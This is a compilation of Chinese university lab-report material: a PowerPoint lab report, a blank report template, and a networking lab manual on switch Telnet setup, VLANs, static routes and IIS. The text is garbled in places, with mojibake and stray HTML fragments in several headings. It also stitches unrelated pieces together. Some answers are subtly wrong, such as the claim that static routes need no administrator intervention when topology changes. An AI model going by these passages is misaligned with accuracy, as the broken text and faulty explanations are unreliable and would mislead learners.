第一篇：大學(xué)一年級(jí) MicrosoftPowerPoint 實(shí)驗(yàn)報(bào)告

天津理工大學(xué)信息工程系信管專(zhuān)業(yè)計(jì)算機(jī)實(shí)踐論文

天津理工大學(xué)

課程設(shè)計(jì)報(bào)告

課程設(shè)計(jì)題目：

學(xué)生學(xué)號(hào)：07322100

學(xué)生姓名：某某某

專(zhuān)

業(yè)：信息管理與信息系統(tǒng) 指導(dǎo)教師：

2008年6 月26 日

天津理工大學(xué)信息工程系信管專(zhuān)業(yè)計(jì)算機(jī)實(shí)踐論文

概 述

PowerPoint（PPT）是當(dāng)今流行的電子文稿演示和制作軟件，具有制作速度塊，兼容性好等優(yōu)點(diǎn)，PowerPoint（PPT）已作為了當(dāng)今學(xué)校，科研場(chǎng)所，公司團(tuán)體必備和必須掌握的軟件之一。作為大學(xué)生的我們，PowerPoint（PPT）不僅是我們將來(lái)就業(yè)需求需要掌握的軟件，也是全國(guó)計(jì)算機(jī)等級(jí)考試中的考試內(nèi)容之一。在本次實(shí)驗(yàn)中，我選擇了PowerPoint（PPT）中第二個(gè)作為論文課題。

天津理工大學(xué)信息工程系信管專(zhuān)業(yè)計(jì)算機(jī)實(shí)踐論文

目錄

一、實(shí)驗(yàn)?zāi)康摹?

二、上機(jī)操作步驟———————————————————4

三、上機(jī)實(shí)驗(yàn)結(jié)果截圖—————————————————5

四、經(jīng)驗(yàn)總結(jié)—————————————————————7 天津理工大學(xué)信息工程系信管專(zhuān)業(yè)計(jì)算機(jī)實(shí)踐論文

一、實(shí)驗(yàn)?zāi)康?/p>

通過(guò)本次上機(jī)操作實(shí)驗(yàn)，力求掌握PPT中自定義動(dòng)畫(huà)的使用，鏈接的使用，對(duì)PPT中層的理解，圖片的融合等內(nèi)容，力求做出精美的幻燈片取悅受眾。

二、上機(jī)操作步驟

1.啟動(dòng) PowerPoint，打開(kāi)演示文稿5-1；

2.將演示文稿5-2添加至演示文稿 5-1 中，并置于 5-1 的幻燈片之后； 3.在第一張幻燈片中刪除主標(biāo)題欄，另復(fù)制一份副標(biāo)題欄，并在第一張幻燈片中插入圖片5-

3、圖片5-4。在兩個(gè)副標(biāo)題欄中分別輸入“季節(jié)”“動(dòng)物”字體分均為黃色，華文行楷。

4.第二張幻燈片主標(biāo)題攔住寫(xiě)入文字“鳥(niǎo)瞰”，單擊主標(biāo)題欄邊緣點(diǎn)擊鼠標(biāo)右鍵，選擇“自定義動(dòng)畫(huà)”選項(xiàng)，在右側(cè)欄中單擊“添加效果”按鈕，添加“溶解” 效果。

5.在“冬”所在的幻燈片中插入圖片5-4，在“冬”所在幻燈片中插入文本框并輸入文字“返回”18 號(hào)字，加粗，淡藍(lán)色，華文行楷；在“冬”所在幻燈片中插入文本框并輸入文字 “ 返回 ”，18 號(hào)字，加粗，淡藍(lán)色，華文行楷； 6.分別將幻燈片一中的“季節(jié)”“動(dòng)物”分別拖到圖片5-

3、圖片5-4中央，分別按住Shift鍵選擇圖片5-

3、“季節(jié)”，單擊鼠標(biāo)右鍵選擇“組合”選項(xiàng)。圖片5-

4、“動(dòng)物”類(lèi)似處理。

7.在第一張幻燈片中選擇“季節(jié)”按鈕，單擊右鍵選擇“超鏈接”，鏈接到幻燈片三；在第一張圖片中選擇“動(dòng)物”按鈕，單擊右鍵選擇“超鏈接”，鏈接到幻燈片七。在第六張幻燈片中選擇返回“按鈕”單擊鼠標(biāo)右鍵選擇“超鏈接”，鏈接到幻燈片一。

8.將“冬”所在幻燈片中的按鈕及文本框復(fù)制到最后一張幻燈片； 9.播放幻燈片，并單擊幻燈片中的各鏈接按鈕，觀察播放效果。

天津理工大學(xué)信息工程系信管專(zhuān)業(yè)計(jì)算機(jī)實(shí)踐論文

三、上機(jī)實(shí)驗(yàn)結(jié)果截圖

幻燈片一

幻燈片六

天津理工大學(xué)信息工程系信管專(zhuān)業(yè)計(jì)算機(jī)實(shí)踐論文

幻燈片九

天津理工大學(xué)信息工程系信管專(zhuān)業(yè)計(jì)算機(jī)實(shí)踐論文

四、經(jīng)驗(yàn)總結(jié)

充分利用超鏈接功能可以快速進(jìn)行不同幻燈片之間的轉(zhuǎn)換；利用圖層對(duì)象組合功能可以制作具有文字的立體質(zhì)感強(qiáng)烈的按鈕，增加PPT美觀性。這次PowerPoint（PPT）上機(jī)實(shí)驗(yàn)讓我們不僅鍛煉了實(shí)際操作能力，也讓我們懂得軟件和文件制作中也要充分考慮美觀性，以及做系統(tǒng)性的文件需要有事先準(zhǔn)備好的邏輯構(gòu)思。感謝老師

在這次上機(jī)實(shí)驗(yàn)中給與我們的親切關(guān)懷和指導(dǎo)。

第二篇：XX大學(xué)實(shí)驗(yàn)報(bào)告模版

XX

大

學(xué)

實(shí)

驗(yàn)

報(bào)

告

課程名稱(chēng)：

實(shí)驗(yàn)項(xiàng)目名稱(chēng)：

學(xué)院：

專(zhuān)業(yè)：

指導(dǎo)教師：

報(bào)告人：

學(xué)號(hào)：

班級(jí)：

實(shí)驗(yàn)時(shí)間：

實(shí)驗(yàn)報(bào)告提交時(shí)間：

教務(wù)部制

實(shí)驗(yàn)?zāi)康模?/p>

實(shí)驗(yàn)原理：

實(shí)驗(yàn)儀器及藥品：

實(shí)驗(yàn)步驟：

數(shù)據(jù)處理分析：

實(shí)驗(yàn)結(jié)論：

指導(dǎo)教師批閱意見(jiàn)：

成績(jī)?cè)u(píng)定：

指導(dǎo)教師簽字：

****年**月**日

備注：

第三篇：江蘇大學(xué)計(jì)算機(jī)網(wǎng)絡(luò)實(shí)驗(yàn)報(bào)告專(zhuān)題

計(jì)算機(jī)網(wǎng)絡(luò)實(shí)驗(yàn)報(bào)告冊(cè)

實(shí)驗(yàn)一

交換機(jī)基本配置 實(shí)驗(yàn)學(xué)時(shí)：2學(xué)時(shí) 實(shí)驗(yàn)類(lèi)型：驗(yàn)證 實(shí)驗(yàn)要求：必修

一、實(shí)驗(yàn)?zāi)康?/p>

1．掌握桌面網(wǎng)絡(luò)組建方法

2．掌握 Quidway S系列中低端交換機(jī)幾種常見(jiàn)配置方法

二、實(shí)驗(yàn)內(nèi)容

1.通過(guò) Console口搭建配置環(huán)境 2.通過(guò) Telnet搭建配置環(huán)境

3.熟悉 VRP的各種視圖及各視圖下的常用命令

三、實(shí)驗(yàn)原理、方法和手段 1.交換機(jī)配置方式

交換機(jī)通常的配置方式有： Console方式 telnet方式 web方式

modem撥號(hào)方式

2.命令行接口 Command-line Interface 華為網(wǎng)絡(luò)設(shè)備中運(yùn)行的操作 VRP(Versatile Routing Platform)向用戶(hù)提 供一系列配置命令以及命令行接口，方便用戶(hù)配置和管理網(wǎng)絡(luò)設(shè)備，包 括以太網(wǎng)交換機(jī)。命令行有如下特性： ?

通過(guò) Console口進(jìn)行本地配置 ?

通過(guò) telnet進(jìn)行本地或遠(yuǎn)程配置

?

通過(guò) modem撥號(hào)登錄到網(wǎng)絡(luò)設(shè)備進(jìn)行遠(yuǎn)程配置

?

配置命令分級(jí)保護(hù)，確保未授權(quán)用戶(hù)無(wú)法侵入到網(wǎng)絡(luò)設(shè)備 ?

用戶(hù)可以隨時(shí)鍵入以獲得在線(xiàn)幫助 1

?

提供網(wǎng)絡(luò)測(cè)試命令，如 tracert、ping等，迅速診斷網(wǎng)絡(luò)是否正常 ?

提供種類(lèi)豐富、內(nèi)容詳盡的調(diào)試信息，幫助診斷網(wǎng)絡(luò)故障 ?

用 telnet命令直接登錄并管理其它網(wǎng)絡(luò)設(shè)備 ?

提供 ftp服務(wù)，方便用戶(hù)上載、下載文件

?

提供類(lèi)似 Doskey的功能，可以執(zhí)行某條歷史命令

?

命令行解釋器對(duì)關(guān)鍵字采取不完全匹配的搜索方法，用戶(hù)只需鍵入 無(wú)沖突關(guān)鍵字即可解釋

四、實(shí)驗(yàn)組織運(yùn)行要求

1．學(xué)生在進(jìn)行實(shí)驗(yàn)前必須進(jìn)行充分的預(yù)習(xí)，熟悉實(shí)驗(yàn)內(nèi)容；

2．學(xué)生嚴(yán)格遵守實(shí)驗(yàn)室的各項(xiàng)規(guī)章制度，注意人身和設(shè)備安全，配合和服 從實(shí)驗(yàn)室人員管理；

3．要求獨(dú)立完成實(shí)驗(yàn)，教師可以給予一定的輔導(dǎo)； 4．教師檢查學(xué)生的實(shí)驗(yàn)結(jié)果； 5．綜合評(píng)定學(xué)生的實(shí)驗(yàn)成績(jī)。

五、實(shí)驗(yàn)條件

1.華為 Quidway S/思科 Catalyst 2960/中興 ZXR10交換機(jī) 2.計(jì)算機(jī)一臺(tái)、配置電纜、局域網(wǎng)環(huán)境

六、實(shí)驗(yàn)步驟

?

通過(guò) Console口搭建配置環(huán)境

1.如圖 1-2，建立本地配置環(huán)境，只需將微機(jī)（或終端）的串口通過(guò)配置電 纜與以太網(wǎng)交換機(jī)的 Console口連接。圖 1‐ 1配置電纜的連接

2.在微機(jī)上運(yùn)行終端仿真程序（如 Windows的超級(jí)終端），設(shè)置終端通信參 數(shù)為：波特率為 9600bit/s、8 位數(shù)據(jù)位、1 位停止位、無(wú)校驗(yàn)和無(wú)流控，并 選擇終端類(lèi)型為 VT100，如圖 1-2至圖

1-3所示：

圖 1‐ 2運(yùn)行 Terminal程序

圖 1‐ 3設(shè)置 Terminal連接時(shí)參數(shù)

3.以太網(wǎng)交換機(jī)上電，終端上顯示以太網(wǎng)交換機(jī)自檢信息，自檢結(jié)束后提示 用戶(hù)輸入回車(chē)，之后將出現(xiàn)命令行提示符（如）。

4.鍵入命令，配置以太網(wǎng)交換機(jī)或查看以太網(wǎng)交換機(jī)運(yùn)行狀態(tài)。需要幫助可 以隨時(shí)鍵入“？”，具體的配置命令可以參考華為相關(guān)文檔。?

通過(guò) Telnet搭建配置環(huán)境

1.在通過(guò) Telnet登錄以太網(wǎng)交換機(jī)之前，需要通過(guò)

Console口在交換機(jī)上配 置欲登錄的 Telnet用戶(hù)名、認(rèn)證口令、驗(yàn)證方式及權(quán)限。 system-view Enter system view, return user view with Ctrl+Z.[Quidway] user-interface vty 0 4（0 4表示從第0到第4共

5個(gè)

vty用戶(hù)）[Quidway-ui-vty0-4] set authentication password simple xxxx（xxxx是欲設(shè)置 的該 Telnet用戶(hù)登錄口令）

[Quidway-ui-vty0-4] authentication-mode password [Quidway-ui-vty0-4] user privilege level 3 2.配置交換機(jī) IP地址，需要進(jìn)入交換機(jī)的VLAN接口

1視圖，通常配置交 換機(jī) VLAN接口

1的IP地址就是配置了交換機(jī)的IP地址。當(dāng)使用

VLAN時(shí) 情況另當(dāng)別論。

[Quidway] interface vlan 1 [Quidway-Vlan-interface1] ip address x.x.x.x x.x.x.x（分別是

IP地址和子網(wǎng)掩 碼）

3.如圖 1-4所示，建立配置環(huán)境，只需將微機(jī)以太網(wǎng)接口通過(guò)局域網(wǎng)與以太 網(wǎng)交換機(jī)的以太網(wǎng)口連接。注意微機(jī)配置的IP 地址必須與以太網(wǎng)交換機(jī)的 IP地址在同一個(gè)子網(wǎng)下。

圖 1‐ 4基于網(wǎng)絡(luò)環(huán)境的配置

在微機(jī)上運(yùn)行 Telnet程序，輸入與相連的以太網(wǎng)口所屬

VLAN的 IP地址，如圖 1-5所示：

圖 1‐ 5 Telnet方式配置

4.終端上顯示“User Access Verification”，并提示用戶(hù)輸入已設(shè)置的登錄口令，口令輸入正確后則出現(xiàn)命令行提示符（如

）。如果出現(xiàn)“Toomany users!”的提示，表示當(dāng)前 Telnet到以太網(wǎng)交換機(jī)的用戶(hù)過(guò)多，則請(qǐng)稍候再連（Quidway系列以太網(wǎng)交換機(jī)最多允許

5個(gè)

Telnet用戶(hù)同時(shí)登錄）。

5.使用相應(yīng)的命令配置以太網(wǎng)交換機(jī)或查看以太網(wǎng)交換機(jī)運(yùn)行狀態(tài)。需要幫 助可以隨時(shí)鍵入“？”，具體的配置命令請(qǐng)參考華為相關(guān)文檔。配置實(shí)例（這里給出思科 ISO的配置過(guò)程）：

Swtich> enable Switch# config terminal Switch(config)# interface vlan 1 Switch(config-if)# ip address 192.168.1.1 255.255.255.0 Switch(config-if)# no shutdown Switch(config-if)# exit Switch(config)# line vty 0 4 Switch(config-line)# password 123456 Switch(config-line)# login Switch(config-line)# end 熟悉 VRP的各種視圖及各視圖下的常用命令

1.熟悉在用戶(hù)視圖、系統(tǒng)視圖、接口視圖之間的切換命令 2.充分利用?熟悉如何獲得命令的關(guān)鍵字和格式 3.了解使用時(shí)出現(xiàn)的各種錯(cuò)誤信息的含義

七、思考題

1.Telnet配置方式比起

console配置方式有哪些優(yōu)點(diǎn)？

答：CONSOLE接口是用來(lái)配置交換機(jī)的，所以只有網(wǎng)管型交換機(jī)才有。而且還要注意，并不是所有網(wǎng)管型交換機(jī)都有，那是因?yàn)榻粨Q機(jī)的配置方法有多種，如通過(guò)Telnet命令行方式、Web方式、TFTP方式等，所以console配置面更廣。2.為什么IP地址要設(shè)置在交換機(jī)的VLAN接口上？

答：VLAN本身是個(gè)虛擬接口，只要你的PC和交換機(jī)線(xiàn)路通了，無(wú)論P(yáng)C連接交換機(jī)哪個(gè)物理接口，都能通過(guò)VLAN接口管理交換機(jī)，用于管理交換機(jī)。由于，二層交換機(jī)不能設(shè)置IP，管理員要管理這個(gè)交換機(jī)，就只能到現(xiàn)場(chǎng)配置，太麻煩了。在Vlan上設(shè)置IP地址，是為了方便遠(yuǎn)程管理二層交換機(jī)，同時(shí)也可以作為對(duì)應(yīng)端口的網(wǎng)關(guān)。

實(shí)驗(yàn)二

基本 VLAN設(shè)置 實(shí)驗(yàn)學(xué)時(shí)：2學(xué)時(shí) 實(shí)驗(yàn)類(lèi)型：驗(yàn)證 實(shí)驗(yàn)要求：必修

一、實(shí)驗(yàn)?zāi)康?/p>

1.掌握配置 VLAN的基本命令

2.在多個(gè)交換機(jī)所組成的交換網(wǎng)絡(luò)中合理組織

VLAN

二、實(shí)驗(yàn)內(nèi)容

1.根據(jù)實(shí)驗(yàn)要求的物理拓?fù)浣Y(jié)構(gòu)連接以太交換網(wǎng)絡(luò)

2.根據(jù)實(shí)驗(yàn)要求的邏輯拓?fù)浣Y(jié)構(gòu)創(chuàng)建 VLAN并將相應(yīng)的用戶(hù)及網(wǎng)段劃分到 對(duì)應(yīng)的 VLAN中去

三、實(shí)驗(yàn)原理、方法和手段 1.VLAN概述

VLAN 技術(shù)出現(xiàn)的一個(gè)主要原因是為了解決以太網(wǎng)的廣播風(fēng)暴。雖然通 過(guò)路由器也可以劃分廣播域，來(lái)減小廣播風(fēng)暴的影響，但路由器本身的 工作機(jī)制會(huì)增加網(wǎng)絡(luò)數(shù)據(jù)傳輸?shù)难舆t，對(duì)網(wǎng)絡(luò)的性能同樣會(huì)產(chǎn)生一定的 影響。所以通過(guò)直接在以太網(wǎng)交換機(jī)上實(shí)施 VLAN，一方面解決了廣播 風(fēng)暴問(wèn)題，另一方面也提供了高速的數(shù)據(jù)轉(zhuǎn)發(fā)服務(wù)。目前常用的 VLAN劃分方式如下： ?

基于端口的VLAN ?

基于 MAC地址的 VLAN ?

基于子網(wǎng)信息的VLAN ?

基于協(xié)議的VLAN 2.IEEE802.1Q協(xié)議

IEEE802.1Q協(xié)議定義了以下的內(nèi)容： ?

VLAN的架構(gòu)

?

VLAN中所提供的服務(wù)

?

VLAN實(shí)施中所涉及的協(xié)議和算法

VLAN的幀格式如圖

2-1： 圖 2‐1 802.1q幀格式

TPID(Tag Protocol Identifier)是 IEEE定義的新的類(lèi)型，表明這是一個(gè) 加了 802.1Q標(biāo)簽的幀。TPID包含了一個(gè)固定的值

0x8100。TCI是幀的控制信息，它包含了下面的一些元素：

Priority：這 3位指明幀的優(yōu)先級(jí)。一共有

8種優(yōu)先級(jí)，0-7。IEEE 802.1Q 標(biāo)準(zhǔn)使用這 3位信息。

Canonical Format Indicator(CFI)：CFI值為

0說(shuō)明是規(guī)范格式，1為非規(guī) 范格式。它被用在令牌環(huán)/源路由 FDDI介質(zhì)訪(fǎng)問(wèn)方法中來(lái)只是封裝幀中 所帶地址的比特次序信息。

VLAN Identifier(VLAN ID)：這是一個(gè) 12位的域，指明

VLAN的ID，一共 4096個(gè)，每個(gè)支持

802.1Q協(xié)議的交換機(jī)發(fā)送出來(lái)的數(shù)據(jù)包都會(huì)包 含這個(gè)域，以指明自己屬于哪一個(gè) VLAN。

在一個(gè)交換網(wǎng)絡(luò)環(huán)境中，以太網(wǎng)的幀有兩種格式：有些幀是沒(méi)有加上這 4 個(gè)字節(jié)標(biāo)志的，稱(chēng)為未標(biāo)記的幀(untagged frame)，有些加上這 4 個(gè)字 節(jié)標(biāo)志的，稱(chēng)為帶有標(biāo)記的幀(tagged frame)。3.VLAN配置基本命令

?

進(jìn)入 VLAN視圖及創(chuàng)建/刪除

VLAN [undo] vlan vlan_id vlan_id是要?jiǎng)?chuàng)建的VLAN的標(biāo)識(shí)。?

給 VLAN指定端口 [undo] port interface_list interface_list 是被指定到該 VLAN 中的端口列表，該命令必須在VLAN 7

視圖下執(zhí)行。

?

給端口指定

VLAN port access vlan vlan_id vlan_id是該端口被指定的VLAN標(biāo)識(shí)，該命令必須在端口視圖下執(zhí)行。?

設(shè)置/取消接口為 VLAN Trunk port link-type {access | trunk | hybrid} 在使用 VLAN的時(shí)候，交換機(jī)連接計(jì)算機(jī)的端口應(yīng)該設(shè)置為 access類(lèi)型，交換機(jī)之間連接的端口應(yīng)該設(shè)置為 trunk類(lèi)型，hybrid類(lèi)型用在其它場(chǎng)合 中，可以參考華為相關(guān)文檔。該命令必須在端口視圖下執(zhí)行。?

設(shè)置/取消 Trunk端口中允許通過(guò)的 VLAN [undo] port trunk permit vlan {vlan_list | all} 當(dāng)某個(gè)端口被設(shè)置為 trunk 類(lèi)型時(shí)，需要指定有哪些 VLAN 的幀可以通 過(guò)該端口，該命令必須在設(shè)置為 trunk類(lèi)型的端口的視圖下執(zhí)行。

四、實(shí)驗(yàn)組織運(yùn)行要求

1．學(xué)生在進(jìn)行實(shí)驗(yàn)前必須進(jìn)行充分的預(yù)習(xí)，熟悉實(shí)驗(yàn)內(nèi)容； 2．學(xué)生擬定實(shí)驗(yàn)方案，熟悉實(shí)驗(yàn)內(nèi)容和實(shí)驗(yàn)步驟；

3．學(xué)生嚴(yán)格遵守實(shí)驗(yàn)室的各項(xiàng)規(guī)章制度，注意人身和設(shè)備安全，配合和服 從實(shí)驗(yàn)室人員管理； 4．學(xué)生應(yīng)獨(dú)立完成實(shí)驗(yàn)，教師可以給予一定的輔導(dǎo)； 5．教師審查、分析學(xué)生實(shí)驗(yàn)方案和實(shí)驗(yàn)結(jié)果； 6．綜合評(píng)定學(xué)生的實(shí)驗(yàn)成績(jī)。

五、實(shí)驗(yàn)條件

1.華為 Quidway／思科 Catalyst 2960/中興 ZXR10交換機(jī) 2.PC機(jī)、局域網(wǎng)環(huán)境

六、實(shí)驗(yàn)步驟

1.按照?qǐng)D 2-2中的拓?fù)浣Y(jié)構(gòu)，通過(guò)配線(xiàn)系統(tǒng)將該以太交換網(wǎng)連接起來(lái)。

圖 2‐2實(shí)驗(yàn)拓?fù)?/p>

2.創(chuàng)建 VLAN，并將 PC機(jī)所連接的交換機(jī)端口劃分到相應(yīng)的VLAN中，配置實(shí)例如下： Switch> enable Switch# config terminal Switch(config)# vlan 2 Switch(config-vlan)# vlan 3 Switch(config-vlan)# exit Switch(config)# interface fa0/1 Switch(config-if)# switchport access vlan 2 Switch(config-if)# interface fa0/2 Switch(config-if)# switchport access vlan 3 Switch(config-if)# end

3.查看 VLAN信息，配置實(shí)例如下： Switch# show vlan

4.設(shè)置交換機(jī)之間的端口為 Trunk類(lèi)型，并制定其封裝格式和

VLAN過(guò)濾 范圍，配置實(shí)例如下： Switch# config terminal Switch(config)# interface fa0/24 Switch(config-if)# switchport mode trunk Switch(config-if)# switchport trunk allowed vlan all 5.測(cè)試 PC 機(jī)之間的連通性，構(gòu)造廣播流量并查看廣播域的范圍。

七、思考題 1.若有一臺(tái) PC機(jī)連接交換機(jī)的Trunk端口，則該

PC機(jī)能否進(jìn)行通信？ 答：可以，trunk模式下，端口用于交換機(jī)間連接。2.基于端口的 VLAN劃分具有哪些優(yōu)點(diǎn)？

答：1.廣播風(fēng)暴防范。限制網(wǎng)絡(luò)上的廣播，將網(wǎng)絡(luò)劃分為多個(gè)VLAN可減少參與廣播風(fēng)暴的設(shè)備數(shù)量。LAN分段可以防止廣播風(fēng)暴波及整個(gè)網(wǎng)絡(luò)。

2.增強(qiáng)局域網(wǎng)的安全性，含有敏感數(shù)據(jù)的用戶(hù)組可與網(wǎng)絡(luò)的其余部分隔離，從而降低泄露機(jī)密信息的可能性。

3..成本高昂的網(wǎng)絡(luò)升級(jí)需求減少，現(xiàn)有帶寬和上行鏈路的利用率更高，因此可節(jié)約成本。4.提高IT員工效率。5.增加網(wǎng)絡(luò)連接的靈活性。

實(shí)驗(yàn)三

路由器安裝與配置 實(shí)驗(yàn)學(xué)時(shí)：2學(xué)時(shí) 實(shí)驗(yàn)類(lèi)型：驗(yàn)證 實(shí)驗(yàn)要求：必修

一、實(shí)驗(yàn)?zāi)康?/p>

1.掌握手工配置路由表的方法 2.掌握讀懂路由表的能力

二、實(shí)驗(yàn)內(nèi)容

1.根據(jù)要求正確連接網(wǎng)絡(luò)

2.正確配置網(wǎng)絡(luò)中設(shè)備的 IP信息

3.正確配置路由器之間的廣域網(wǎng)協(xié)議參數(shù) 4.在路由器上配置靜態(tài)路由協(xié)議

三、實(shí)驗(yàn)原理、方法和手段 1.靜態(tài)路由簡(jiǎn)介

靜態(tài)路由是一種特殊的路由，由管理員手工配置而成。在組網(wǎng)結(jié)構(gòu)較簡(jiǎn) 單、到給定目標(biāo)只有一條路徑的網(wǎng)絡(luò)中，只需配置靜態(tài)路由就能使路由 器正常工作。正確地設(shè)置和使用靜態(tài)路由能有效地保證網(wǎng)絡(luò)安全，并可 為重要的應(yīng)用保證帶寬。

使用靜態(tài)路由也存在一些問(wèn)題：當(dāng)網(wǎng)絡(luò)出現(xiàn)問(wèn)題或因其它原因引起拓?fù)?變化時(shí)，靜態(tài)路由不會(huì)自動(dòng)發(fā)生改變，不需要有網(wǎng)絡(luò)管理員的介入。2.靜態(tài)路由的配置 靜態(tài)路由的配置包括： ?

配置靜態(tài)路由

表 3‐ 1 配置缺省路由 表 3‐ 2

配置靜態(tài)路由缺省優(yōu)先級(jí)

表 3‐ 3

?

?

路由表的顯示和調(diào)試 表 3‐ 4

四、實(shí)驗(yàn)組織運(yùn)行要求

1．學(xué)生在進(jìn)行實(shí)驗(yàn)前必須進(jìn)行充分的預(yù)習(xí)，熟悉實(shí)驗(yàn)內(nèi)容； 2．學(xué)生擬定實(shí)驗(yàn)方案，熟悉實(shí)驗(yàn)內(nèi)容和實(shí)驗(yàn)步驟；

3．學(xué)生嚴(yán)格遵守實(shí)驗(yàn)室的各項(xiàng)規(guī)章制度，注意人身和設(shè)備安全，配合和服 從實(shí)驗(yàn)室人員管理；

4．學(xué)生應(yīng)獨(dú)立完成實(shí)驗(yàn)，教師可以給予一定的輔導(dǎo)； 5．教師審查、分析學(xué)生實(shí)驗(yàn)方案和實(shí)驗(yàn)結(jié)果； 6．綜合評(píng)定學(xué)生的實(shí)驗(yàn)成績(jī)。

五、實(shí)驗(yàn)條件

1.華為Quidway/思科2811/中興ZXR路由器 2.計(jì)算機(jī)、局域網(wǎng)環(huán)境

六、實(shí)驗(yàn)步驟

1.將計(jì)算機(jī)、交換機(jī)、路由器連接成如圖 3-1的拓?fù)浣Y(jié)構(gòu)。圖 3‐ 1實(shí)驗(yàn)拓?fù)浣Y(jié)構(gòu)

2.給每一臺(tái)路由器的連接接口設(shè)置 IP地址和掩碼，配置實(shí)例如下： Router>enable Router#hostname Router0 Router0#config terminal Router0(config)# interface fa0/0 Router0(config-if)# ip address 192.168.1.1 255.255.255.0 Router0(config-if)# no shutdown Router0(config-if)# interface fa0/1 Router0(config-if)# ip address 192.168.2.1 255.255.255.0 Router0(config-if)# no shutdown

配置完畢后，路由器連接的接口都處于工作狀態(tài)，如圖

3-2

圖 3‐ 2路由器接口啟動(dòng)后的拓?fù)?/p>

3.為 PC機(jī)設(shè)置

IP地址、子網(wǎng)掩碼、網(wǎng)關(guān)地址，測(cè)試

PC機(jī)可以尋址的范 圍，即與其它哪些路由器的路徑可達(dá)。4.查看路由器的路由表，配置實(shí)例： Router0# show ip route 分析路由表的表項(xiàng)及路徑可達(dá)范圍。

5.在路由器上添加去往非直連網(wǎng)絡(luò)的靜態(tài)路由，并測(cè)試 PC機(jī)的尋址范圍，配置實(shí)例如下：

Router0# config terminal Router0(config)# ip route 192.168.4.0 255.255.255.0 192.168.2.1 6.查看路由器的路由表，并分析分組的路由過(guò)程。

七、思考題

1.當(dāng)路由表中存在多條下一跳同樣的靜態(tài)路由，應(yīng)如何簡(jiǎn)化路由的配置？

答：（1）如果路由表中除了直連路由（標(biāo)記為C），其他靜態(tài)路由全是指向同一個(gè)下一跳，那么可以將這些靜態(tài)路由刪了，使用一條目的網(wǎng)段全0的靜態(tài)默認(rèn)路由代替之前的所有路由；

（2）如果這些靜態(tài)路由條目只是其中大部分指向了同一個(gè)下一跳，但是還有一些靜態(tài)不是指向該下一跳，那么可以根據(jù)這些靜態(tài)路由的目的IP子網(wǎng)，看能否進(jìn)行匯總。

目前簡(jiǎn)化路由表的手段主要就是做子網(wǎng)匯總，情況1其實(shí)也是匯總，只是匯總的范圍比較大而已。

2.試在實(shí)驗(yàn)環(huán)境中通過(guò)設(shè)置靜態(tài)路由，形成路由環(huán)路。

實(shí)驗(yàn)四

網(wǎng)絡(luò)應(yīng)用層協(xié)議分析與服務(wù)配置 實(shí)驗(yàn)學(xué)時(shí)：2學(xué)時(shí) 實(shí)驗(yàn)類(lèi)型：綜合 實(shí)驗(yàn)要求：必修

一、實(shí)驗(yàn)?zāi)康?/p>

1.掌握 Web服務(wù)器的設(shè)置方法 2.掌握 FTP服務(wù)器的設(shè)置方法 3.熟悉 Mail服務(wù)器的設(shè)置方法

二、實(shí)驗(yàn)內(nèi)容

1.在 Windows上運(yùn)行并設(shè)置

IIS服務(wù) 2.通過(guò)設(shè)置提供 Web、FTP、Mail服務(wù) 3.對(duì)提供的服務(wù)進(jìn)行測(cè)試

三、實(shí)驗(yàn)原理、方法和手段 1.IIS之

Web服務(wù)器

在 Windows桌面上，右鍵點(diǎn)擊“我的電腦”，選擇“管理”，在出現(xiàn)的“計(jì) 算機(jī)管理”窗口中打開(kāi)“Internet信息服務(wù)”控制臺(tái)，雙擊計(jì)算機(jī)名可以 展開(kāi)可管理的服務(wù)，如圖 4-1所示。圖 4‐ 1計(jì)算機(jī)管理

右擊“默認(rèn)網(wǎng)站”，選擇“屬性”，“默認(rèn)網(wǎng)站 屬性”對(duì)話(huà)框中包含了許 多選項(xiàng)卡，這里經(jīng)常使用的包括“網(wǎng)站”、“主目錄”、“文檔”、以及“目 錄安全性”。

其中，“網(wǎng)站”選項(xiàng)卡主要用來(lái)設(shè)置

Web 站點(diǎn)標(biāo)識(shí)、連接屬性、日志記 錄等。這里主要注意 Web站點(diǎn)所使用的IP地址和

TCP端口號(hào)，它們將 決定用戶(hù)如何訪(fǎng)問(wèn)到該 Web服務(wù)，如圖

5-2所示。圖 4‐ 2網(wǎng)站設(shè)置

“主目錄”選項(xiàng)卡的作用包括網(wǎng)站內(nèi)容的來(lái)源、對(duì)網(wǎng)絡(luò)內(nèi)容的控制權(quán)限、以及應(yīng)用程序的設(shè)置。在缺省的情況下，網(wǎng)站的內(nèi)容放置在本地的

c:inetpubwwwroot目錄下。管理員可以根據(jù)需要改變這些設(shè)置，如圖

5-3 所示。

圖 4‐ 3主目錄的設(shè)置

“文檔”選項(xiàng)卡用于指定啟用的默認(rèn)文檔。所謂默認(rèn)文檔是指當(dāng)瀏覽器 訪(fǎng)問(wèn) Web 服務(wù)時(shí)，不需要提供想要訪(fǎng)問(wèn)的文件名，只要輸入 Web 服務(wù) 器的 URL即可，服務(wù)器會(huì)自動(dòng)將默認(rèn)的文檔提供給瀏覽器。目前大部分 的 Web 站點(diǎn)的主頁(yè)文件名都為“index.htm”，當(dāng)然也可以指定其它的文 件名，同時(shí)有多個(gè)文件名時(shí)，可以指定訪(fǎng)問(wèn)的先后次序，如圖 5-4所示。圖 4‐ 4文檔設(shè)置

“目錄安全性”選項(xiàng)卡的主要用來(lái)指定

Web 服務(wù)器對(duì)訪(fǎng)問(wèn)用戶(hù)的驗(yàn)證 方式。IIS 的 Web 服務(wù)缺省是不對(duì)用戶(hù)進(jìn)行驗(yàn)證的，用戶(hù)直接可以訪(fǎng)問(wèn) Web服務(wù)，如圖

5-5所示。

另外，在部署一個(gè)新的網(wǎng)站時(shí)，可以為它單獨(dú)創(chuàng)建一個(gè) Web 虛擬目錄，然后為這個(gè)虛擬目錄指定別名，以及站點(diǎn)內(nèi)容所在的路徑。之后要訪(fǎng)問(wèn) 這個(gè)站點(diǎn)的內(nèi)容的話(huà)，可以通過(guò)這樣形式的 URL來(lái)指定：“http://Web服 務(wù)器的域名或 IP地址/別名/“來(lái)訪(fǎng)問(wèn)。2.IIS之

FTP服務(wù)器

IIS的FTP服務(wù)同樣在“Internet信息服務(wù)”控制臺(tái)中可以找到，缺省為 “FTP 站點(diǎn)”。通過(guò)右擊選擇屬性，可以設(shè)置 FTP 服務(wù)的相關(guān)參數(shù)，如 圖 5-6。

圖 4‐ 6安全賬戶(hù)設(shè)置

